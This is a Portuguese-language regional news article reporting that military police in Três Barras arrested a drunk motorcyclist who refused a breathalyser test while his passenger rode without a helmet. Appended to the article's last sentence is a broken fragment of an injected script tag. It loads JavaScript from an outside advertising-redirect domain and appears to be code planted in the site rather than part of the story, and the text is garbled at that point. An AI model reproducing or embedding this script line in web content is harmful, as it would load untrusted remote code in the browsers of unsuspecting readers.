InícioDestaquePM Flagra Motociclista Embriagado e Sem Capacete em Três Barras

PM Flagra Motociclista Embriagado e Sem Capacete em Três Barras

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

No domingo, 08, por volta das 23h55, equipes da PM de Canoinhas realizavam ações de policia ostensiva pelo bairro São Cristovão, quando na Rua Etelvina de Almeida Pires, no município de Três Barras se deparou com uma motocicleta transitando em sentido contrário onde, o carona estava sem capacete.

 

Os policiais militares iniciaram o acompanhamento da motocicleta Yamaha/Factor onde, a motocicleta seguiu sentido ao rio, na antiga rua próximo a ponte que divide a cidade de Três Barras com Canoinhas e já na via a guarnição logrou êxito na abordagem do condutor.

 

O carona da motocicleta já havia se evadido do local e após a verificação na motocicleta nada de irregular foi encontrado, porém o condutor apresentou vários sinais de embriaguez como odor etílico, andar cambaleante, fala arrastada e olhos avermelhados. Para o condutor foi oferecido o teste do etilômetro, o qual se negou.

 

Diante dos fatos foi proferida voz de prisão ao condutor o qual foi conduzido até a Delegacia de Polícia para providências cabíveis, sendo que foi lavrado auto de constatação de sinais de embriaguez e, a motocicleta foi deixada na condução de um homem, o qual estava presente no local dos fatos devidamente habilitado…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.